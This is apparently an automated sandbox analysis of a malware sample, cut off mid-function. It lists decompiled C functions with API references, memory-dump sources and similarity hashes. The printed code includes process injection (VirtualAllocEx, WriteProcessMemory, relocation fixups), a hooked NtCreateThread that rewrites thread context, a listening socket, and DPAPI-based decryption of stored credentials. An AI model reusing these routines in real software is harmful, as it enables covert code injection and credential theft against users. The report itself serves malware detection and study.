				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t1 = _t55 + 0x3c; // 0xd8
				_t60 =  *_t1 + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00411159(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E00411106(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x00415822
0x00415824
0x00415827
0x00415829
0x0041582e
0x00415831
0x0041583d
0x00415853
0x00415859
0x0041585c
0x0041585e
0x00415914
0x00000000
0x00415914
0x0041586b
0x0041586d
0x0041586f
0x00415871
0x004158fd
0x0041590a
0x00415910
0x00415910
0x00415910
0x00000000
0x00415910
0x00415877
0x0041587d
0x004158f1
0x004158f2
0x004158f7
0x004158fb
0x00000000
0x00000000
0x00000000
0x004158fb
0x0041587f
0x00415885
0x00415887
0x00000000
0x00000000
0x00415889
0x00415891
0x00415893
0x00415896
0x004158d6
0x004158d6
0x004158d8
0x00000000
0x00000000
0x0041589a
0x0041589d
0x004158a0
0x004158d1
0x004158d1
0x004158d4
0x004158d4
0x00000000
0x004158d4
0x004158a5
0x004158a5
0x004158a7
0x004158aa
0x00000000
0x00000000
0x00000000
0x00000000
0x004158ac
0x004158ac
0x004158af
0x004158b4
0x004158b7
0x004158bf
0x004158c6
0x004158c6
0x004158c6
0x004158c6
0x004158c9
0x004158cc
0x004158cc
0x00000000
0x004158ac
0x004158e5
0x004158eb
0x004158ed
0x004158ed
0x004158ed
0x00000000
0x004158ed
0x00000000

APIs

IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00415835
VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 00415853
WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,00400000,00000000,00400000,?,?,74B5F560,00000000), ref: 004158E5
VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,00400000,?,?,74B5F560,00000000), ref: 0041590A

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: a7b6dd3d706f2f9495a4aaecab9c1e719e5aa556d899e9e93c5534505d3d2f33
Instruction ID: ee52e8a917456dac8c0b12ff69a5ae926dcc1775b6dada67237ccc16f024d014
Opcode Fuzzy Hash: a7b6dd3d706f2f9495a4aaecab9c1e719e5aa556d899e9e93c5534505d3d2f33
Instruction Fuzzy Hash: 7D31CE71E00618EFCF10ABA4CC84BEEBBB4BF85715F1440AAE505B62A0D3749D90CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00414164, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 0041416D
bind.WS2_32(00000000,?,-0000001D), ref: 0041418D
listen.WS2_32(00000000,?), ref: 0041419C
closesocket.WS2_32(00000000), ref: 004141A7

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 94d28268ac41eba900371f48eb6f6e3354ad8adca4119d380cebbd32af3b6e1d
Instruction ID: ccee8f17ebe4a93b630d5f0d370988e1e5d071bfb8ded29b2d4f92ce7412beff
Opcode Fuzzy Hash: 94d28268ac41eba900371f48eb6f6e3354ad8adca4119d380cebbd32af3b6e1d
Instruction Fuzzy Hash: EBF030722001017AE6201F39DD4DBBF3ABA9BD1771B18472AF965D21F1E73884C1D628

Uniqueness

Uniqueness Score: -1.00%

Function 0040E904, Relevance: 4.6, APIs: 3, Instructions: 62
nativethreadCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040E904(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
				void _v28;
				long _v32;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t27;
				signed int _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				void* _t40;
				void* _t42;

				_t42 = __esi;
				_t38 = __edx;
				_t35 = __ecx;
				_push(_t32);
				_t21 = E00406B23();
				_t40 = _a16;
				if(_t21 != 0 && NtQueryInformationProcess(_t40, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E0041277B(_t32, _v28) == 0)) {
					_t34 = E00406946(_t35, _t38, _v28);
					_t51 = _t34;
					if(_t34 != 0) {
						_t27 = E00406A38(_t35, _t40, _t42, _t51, _t34, 0);
						if(_t27 != 0) {
							_t30 = _t27 -  *0x41e5a4 + E00407132;
							if(( *0x41e590 & 0x00000010) != 0) {
								_t30 = _t30 ^  *(_a24 + 0xb0);
							}
							 *(_a24 + 0xb0) = _t30;
						}
						CloseHandle(_t34);
					}
				}
				return NtCreateThread(_a4, _a8, _a12, _t40, _a20, _a24, _a28, _a32);
			}

0x0040e904
0x0040e904
0x0040e904
0x0040e90d
0x0040e90f
0x0040e914
0x0040e919
0x0040e958
0x0040e95a
0x0040e95c
0x0040e961
0x0040e968
0x0040e970
0x0040e97c
0x0040e981
0x0040e981
0x0040e98a
0x0040e98a
0x0040e991
0x0040e991
0x0040e95c
0x0040e9b8

APIs

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 0040E92A
CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040E991

Part of subcall function 0041277B: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00412788
Part of subcall function 0041277B: Thread32First.KERNEL32 ref: 004127A3
Part of subcall function 0041277B: CloseHandle.KERNEL32(00000000), ref: 004127C4

NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 0040E9AD

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
String ID:
API String ID: 3154080929-0
Opcode ID: 89d60d981338ede8ca1a61e3567d9ed833a2c22dd8fc82e8d5e6e9b103f922c7
Instruction ID: f9aa09d5b9dcb29411145294671f95b3bc18cd638af679679804d5dd09476ce7
Opcode Fuzzy Hash: 89d60d981338ede8ca1a61e3567d9ed833a2c22dd8fc82e8d5e6e9b103f922c7
Instruction Fuzzy Hash: 47119071100245ABDB119F96CC45FAB3FA9BB48308F04493ABE44A51E1D739D821DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00414400, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 00414409
bind.WS2_32(00000000,00000017,-0000001D), ref: 00414429
closesocket.WS2_32(00000000), ref: 00414434

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: aa0f011803f6f40e92c779f580d8bed4f27866cf00897806415d85c7d6183982
Instruction ID: 5ab3e6cf6f5729b3ed38296d900faf262f6a2c7fa94670ef67fcaca4f47b1c02
Opcode Fuzzy Hash: aa0f011803f6f40e92c779f580d8bed4f27866cf00897806415d85c7d6183982
Instruction Fuzzy Hash: 50E04F7220051166E6202B3EAD8EF7F35A99BC5B71F584729F9B1D21F1EB7888C2D134

Uniqueness

Uniqueness Score: -1.00%

Function 00409D29, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00409D29(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E00409CD6(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E00409CD6(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E00409CD6(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E00409CD6(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E00409CD6(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E00411C55(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E004110D6(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E00411943(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
										_v16 = E004114C2(_v52);
										LocalFree(_v52);
									}
								}
								E00411106(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E0040CA33(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E0040CA33(_t68, _t117);
					_t70 = 0x40310c;
					_t109 =  ==  ? 0x40310c : _v16;
					_t97 =  ==  ? 0x40310c : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E00411E87(_a12, E00411C55( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E00411106(_v16);
				}
				E004174B5(E004174B5(E004174B5(E004174B5(E004174B5(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

0x00409d29
0x00409d34
0x00409d37
0x00409d3a
0x00409d3d
0x00409d42
0x00409d45
0x00409d49
0x00409d4e
0x00409d51
0x00409d55
0x00409d5a
0x00409d5d
0x00409d61
0x00409d66
0x00409d69
0x00409d77
0x00409d7a
0x00409d81
0x00409dcd
0x00409dd0
0x00409dd7
0x00409de0
0x00409de6
0x00409dec
0x00409dec
0x00409ded
0x00409def
0x00409df4
0x00409df7
0x00409dfc
0x00409e01
0x00409e0f
0x00409e1b
0x00409e20
0x00409e29
0x00409e39
0x00409e3c
0x00409e3c
0x00409e29
0x00409e45
0x00409e45
0x00409e01
0x00409ded
0x00409e52
0x00409e53
0x00409e5a
0x00409e5d
0x00409e5e
0x00409e6b
0x00409e70
0x00409e75
0x00409e78
0x00409e7b
0x00409e7d
0x00409e7d
0x00409e7f
0x00409e83
0x00409e86
0x00409e88
0x00409e9e
0x00409ea9
0x00409eae
0x00409ed2
0x00409edd

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 00409E20
LocalFree.KERNEL32(?,?,?,?), ref: 00409E3C

Part of subcall function 00411106: HeapFree.KERNEL32(00000000,00000000,004128FD,00000000,?,?,?,0040628D,00000000,0040675B), ref: 00411119

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Free$CryptDataHeapLocalUnprotect
String ID:
API String ID: 2231100991-0
Opcode ID: 3dbca34cf350b6e17f968eb0edcb66274745a5cab3c52f77b29df391b092c930
Instruction ID: dc3d5c506dba8bf9e8af29a0913f48728844c3b9e113be30aa0cb1b6caece7bf
Opcode Fuzzy Hash: 3dbca34cf350b6e17f968eb0edcb66274745a5cab3c52f77b29df391b092c930
Instruction Fuzzy Hash: 21514C71E04119AADF10EFB6CC559EEBBB5EF04314F10443AF615B72A2D6394D81CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0041404D, Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 0041409A
recv.WS2_32(?,?,00000000,00000000), ref: 004140B2

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: recvselect
String ID:
API String ID: 741273618-0
Opcode ID: 5baeb40a0d6eb7d9f9e2157ccabcb97fe6db50f5d332ecf06f798576f51dd92f
Instruction ID: 65f473436dd6eb499de961e2c173246bb2d2b2272c757328f5ee8324b6685a8b
Opcode Fuzzy Hash: 5baeb40a0d6eb7d9f9e2157ccabcb97fe6db50f5d332ecf06f798576f51dd92f
Instruction Fuzzy Hash: C9F0C872C101246BC7189F25CC449DE7FADDF46320F108366B55AE11E4D6744AC4CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00411208, Relevance: 3.0, APIs: 2, Instructions: 15
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411208() {
				struct _FILETIME _v12;
				struct _SYSTEMTIME _v28;

				GetSystemTime( &_v28);
				SystemTimeToFileTime( &_v28,  &_v12);
				return E00411266( &_v12);
			}

0x00411212
0x00411220
0x0041122f

APIs

GetSystemTime.KERNEL32(?,?,?,0041058F,00000000,000000FF,00000000), ref: 00411212
SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,0041058F,00000000,000000FF,00000000), ref: 00411220

Part of subcall function 00411266: __aulldiv.LIBCMT ref: 0041127F

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Time$System$File__aulldiv
String ID:
API String ID: 1459046340-0
Opcode ID: 0bb5171bf70a4730eb29518b68652d8b5fcc8c0c08b155dc10e7d7a35b7fce9f
Instruction ID: b63f5312fb8886f298130c068196ad6a19dbdb04f5f100225eec53df67e842ac
Opcode Fuzzy Hash: 0bb5171bf70a4730eb29518b68652d8b5fcc8c0c08b155dc10e7d7a35b7fce9f
Instruction Fuzzy Hash: BFD09E7580010FABCF00EBE4D95ACDEBB7CAA04308F404565A601E21A1EA34A2869B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040A448, Relevance: 1.7, APIs: 1, Instructions: 179
comCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0040A448() {
				signed int _v5;
				void* _v12;
				signed short* _v16;
				char _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				char _v56;
				void* _v260;
				char _v356;
				char _v460;
				void* __edi;
				void* __esi;
				char* _t52;
				void* _t53;
				void* _t55;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr* _t79;
				intOrPtr* _t84;
				intOrPtr* _t86;
				void* _t87;
				signed short* _t88;
				intOrPtr _t96;
				signed int _t113;
				intOrPtr* _t117;
				char* _t119;
				char* _t121;

				_t52 =  &_v32;
				_v32 = 0;
				__imp__CoCreateInstance(0x401558, 0, 0x4401, 0x401538, _t52);
				if(_t52 != 0) {
					L3:
					_v16 = 0;
					_t117 = 0;
					L4:
					if(_t117 == 0) {
						return _t52;
					}
					_t53 = 0x39;
					E0040CA33(_t53,  &_v56);
					_t121 =  &_v40;
					_t55 = 0x3a;
					E0040CA33(_t55, _t121);
					_push(_t121);
					_push( &_v56);
					_push(_t117);
					_v20 = 0;
					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
						L31:
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_push(0xcc);
						return E004095BC(_t114, _v20, 0x38);
					}
					_push( &_v12);
					_push(_t117);
					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
						goto L31;
					}
					_t65 = 0x3b;
					E0040CA33(_t65,  &_v356);
					_t67 = _v12;
					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
					_t69 = _v12;
					_push(_t69);
					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
						L30:
						_t71 = _v12;
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						goto L31;
					}
					_t96 = 0x64;
					do {
						_t73 = _v12;
						_t114 =  &_v28;
						_push( &_v28);
						_push(_t73);
						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
							goto L28;
						}
						_t77 = _v28;
						_t114 =  &_v24;
						_push( &_v24);
						_push(0x401548);
						_push(_t77);
						if( *((intOrPtr*)( *_t77))() != 0) {
							L27:
							_t79 = _v28;
							 *((intOrPtr*)( *_t79 + 8))(_t79);
							goto L28;
						}
						_v5 = 1;
						while(1) {
							_push(_v5 & 0x000000ff);
							_push( &_v356);
							_t114 = 0x34;
							_t119 =  &_v460;
							if(E00411DF9( &_v356, _t114, _t119) <= 0) {
								break;
							}
							_t86 = _v24;
							_t114 = _t119;
							_v36 = _t96;
							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
							if(_t87 != 0) {
								if(_t87 == 0x7a || _t87 == 1) {
									L25:
									_v5 = _v5 + 1;
									if(_v5 <= _t96) {
										continue;
									}
								}
								break;
							}
							_t88 =  &_v260;
							if(_v260 == 0) {
								L18:
								if( *_t88 != 0x40) {
									_t88 = 0;
								}
								L20:
								if(_t88 != 0 && E004114FA( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
									E004114FA(1,  &_v20, 0x4031a0);
								}
								goto L25;
							}
							_t113 = _v260 & 0x0000ffff;
							while(_t113 != 0x40) {
								_t88 =  &(_t88[1]);
								_t113 =  *_t88 & 0x0000ffff;
								if(_t113 != 0) {
									continue;
								}
								goto L18;
							}
							goto L20;
						}
						_t84 = _v24;
						 *((intOrPtr*)( *_t84 + 8))(_t84);
						goto L27;
						L28:
						_t75 = _v12;
						_push(_t75);
					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
					_t117 = _v16;
					goto L30;
				}
				_t117 = _v32;
				if(_t117 == 0) {
					goto L3;
				} else {
					_v16 = _t117;
					goto L4;
				}
			}

0x0040a454
0x0040a46a
0x0040a46d
0x0040a475
0x0040a483
0x0040a483
0x0040a486
0x0040a488
0x0040a48a
0x0040a62d
0x0040a62d
0x0040a495
0x0040a496
0x0040a49d
0x0040a4a0
0x0040a4a1
0x0040a4aa
0x0040a4ae
0x0040a4af
0x0040a4b0
0x0040a4b8
0x0040a613
0x0040a616
0x0040a61c
0x00000000
0x0040a624
0x0040a4c3
0x0040a4c4
0x0040a4ca
0x00000000
0x00000000
0x0040a4d8
0x0040a4d9
0x0040a4de
0x0040a4e4
0x0040a4e7
0x0040a4ec
0x0040a4f2
0x0040a60a
0x0040a60a
0x0040a610
0x00000000
0x0040a610
0x0040a4fa
0x0040a4fb
0x0040a4fb
0x0040a500
0x0040a503
0x0040a504
0x0040a50a
0x00000000
0x00000000
0x0040a510
0x0040a515
0x0040a518
0x0040a519
0x0040a51e
0x0040a523
0x0040a5ed
0x0040a5ed
0x0040a5f3
0x00000000
0x0040a5f3
0x0040a529
0x0040a52d
0x0040a531
0x0040a538
0x0040a53b
0x0040a53c
0x0040a54b
0x00000000
0x00000000
0x0040a551
0x0040a562
0x0040a565
0x0040a56b
0x0040a570
0x0040a5d1
0x0040a5d8
0x0040a5d8
0x0040a5de
0x00000000
0x00000000
0x0040a5de
0x00000000
0x0040a5d1
0x0040a57a
0x0040a580
0x0040a59a
0x0040a59e
0x0040a5a0
0x0040a5a0
0x0040a5a2
0x0040a5a4
0x0040a5c7
0x0040a5c7
0x00000000
0x0040a5a4
0x0040a582
0x0040a589
0x0040a58f
0x0040a592
0x0040a598
0x00000000
0x00000000
0x00000000
0x0040a598
0x00000000
0x0040a589
0x0040a5e4
0x0040a5ea
0x00000000
0x0040a5f6
0x0040a5f6
0x0040a5fb
0x0040a5ff
0x0040a607
0x00000000
0x0040a607
0x0040a477
0x0040a47c
0x00000000
0x0040a47e
0x0040a47e
0x00000000
0x0040a47e

APIs

CoCreateInstance.OLE32(00401558,00000000,00004401,00401538,?,?,00000000), ref: 0040A46D

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 7301934b5e479e3bc81d1dcf83ae20aa2bcdfb6ba2ad5813d983fa8bb5d5dacf
Instruction ID: 91f3e1c1c6097437d95edf20dfdbb960c579318d36708e1dcc780f0d5acc0e9c
Opcode Fuzzy Hash: 7301934b5e479e3bc81d1dcf83ae20aa2bcdfb6ba2ad5813d983fa8bb5d5dacf
Instruction Fuzzy Hash: A0515D71A00309ABDB14DBA5CC84AAFB778BF48714F1444AAE502FB290D779EE42CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004078CA, Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004078CA() {
				void* _t23;
				void* _t27;
				void* _t29;
				void* _t31;

				_t29 = _t31 - 0x78;
				_t27 = 0;
				 *(_t29 - 0xa4) = 0x11c;
				if(GetVersionExW(_t29 - 0xa4) == 0) {
					L25:
					return _t27;
				}
				_t23 = 2;
				if( *((intOrPtr*)(_t29 - 0x94)) != _t23) {
					goto L25;
				}
				if( *((intOrPtr*)(_t29 + 0x76)) != 1) {
					if( *((intOrPtr*)(_t29 + 0x76)) == _t23 ||  *((char*)(_t29 + 0x76)) == 3) {
						if( *((intOrPtr*)(_t29 - 0xa0)) != 5) {
							if( *((intOrPtr*)(_t29 - 0xa0)) != 6) {
								goto L25;
							}
							if( *((intOrPtr*)(_t29 - 0x9c)) != _t27) {
								if( *((intOrPtr*)(_t29 - 0x9c)) != 1) {
									goto L25;
								}
								_push(7);
								L24:
								_pop(_t27);
								goto L25;
							}
							_push(5);
							goto L24;
						}
						if( *((intOrPtr*)(_t29 - 0x9c)) != _t23) {
							goto L25;
						}
						_push(3);
						goto L24;
					} else {
						goto L25;
					}
				}
				if( *((intOrPtr*)(_t29 - 0xa0)) != 5) {
					if( *((intOrPtr*)(_t29 - 0xa0)) != 6) {
						goto L25;
					}
					if( *((intOrPtr*)(_t29 - 0x9c)) != 0) {
						if( *((intOrPtr*)(_t29 - 0x9c)) != 1) {
							goto L25;
						}
						_push(6);
						goto L24;
					}
					_push(4);
					goto L24;
				} else {
					if( *((intOrPtr*)(_t29 - 0x9c)) != 0) {
						if( *((intOrPtr*)(_t29 - 0x9c)) == 1 ||  *((intOrPtr*)(_t29 - 0x9c)) == _t23) {
							_t27 = _t23;
						}
					} else {
						_t27 = 1;
					}
					goto L25;
				}
			}

0x004078cb
0x004078dd
0x004078df
0x004078f1
0x00407998
0x0040799f
0x0040799f
0x004078f9
0x00407900
0x00000000
0x00000000
0x0040790c
0x0040795b
0x0040796a
0x0040797f
0x00000000
0x00000000
0x00407987
0x00407993
0x00000000
0x00000000
0x00407995
0x00407997
0x00407997
0x00000000
0x00407997
0x00407989
0x00000000
0x00407989
0x00407972
0x00000000
0x00000000
0x00407974
0x00000000
0x00000000
0x00000000
0x00000000
0x0040795b
0x00407915
0x0040793e
0x00000000
0x00000000
0x00407946
0x00407952
0x00000000
0x00000000
0x00407954
0x00000000
0x00407954
0x00407948
0x00000000
0x00407917
0x0040791d
0x00407929
0x00407933
0x00407933
0x0040791f
0x0040791f
0x0040791f
0x00000000
0x0040791d

APIs

GetVersionExW.KERNEL32(?,74B04EE0), ref: 004078E9

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: bb1a81f7342768f687b0b0b82f29e4a1bc482dc97bc03e119f805794b6ed64f3
Instruction ID: 471da307a433b334e6a8a6fac0338afc201cf11daa044c0fe1f6a5a5692a7f9e
Opcode Fuzzy Hash: bb1a81f7342768f687b0b0b82f29e4a1bc482dc97bc03e119f805794b6ed64f3
Instruction Fuzzy Hash: 682118B0D5C329CAFF308A688C01BAA76649B12716F0051FFD54AB12C2D2782AC4CF5B

Uniqueness

Uniqueness Score: -1.00%

Function 00411230, Relevance: 1.5, APIs: 1, Instructions: 20
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411230() {
				long _t7;
				signed int _t8;
				intOrPtr _t9;
				void* _t11;
				void* _t13;

				_t11 = _t13 - 0x78;
				_t7 = GetTimeZoneInformation(_t11 - 0x34);
				if(_t7 != 1) {
					if(_t7 != 2) {
						_t8 = 0;
					} else {
						_t9 =  *((intOrPtr*)(_t11 + 0x74));
						goto L4;
					}
				} else {
					_t9 =  *((intOrPtr*)(_t11 + 0x20));
					L4:
					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
				}
				return _t8;
			}

0x00411231
0x0041123f
0x00411248
0x00411252
0x0041125f
0x00411254
0x00411254
0x00000000
0x00411254
0x0041124a
0x0041124a
0x00411257
0x0041125a
0x0041125a
0x00411265

APIs

GetTimeZoneInformation.KERNEL32(?), ref: 0041123F

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: InformationTimeZone
String ID:
API String ID: 565725191-0
Opcode ID: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
Instruction ID: 06d1411a830d89164962127044dfd91d78c7ef6e52445d39d680722943cc58f3
Opcode Fuzzy Hash: 09fcd8e40e31890f13ce203173545b96c56f290b75b689b4eeefc61c2ff40cf3
Instruction Fuzzy Hash: 51E086315440088BDB20EBA4DE85CDD77E6AB51304F300452F642F6160D238D9858607

Uniqueness

Uniqueness Score: -1.00%

Function 0040ED74, Relevance: 1.4, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E0040ED74() {
				void* __ebx;
				intOrPtr _t1;
				intOrPtr _t2;
				signed int _t53;
				void* _t55;
				void* _t56;

				_t1 =  *0x41e5b4;
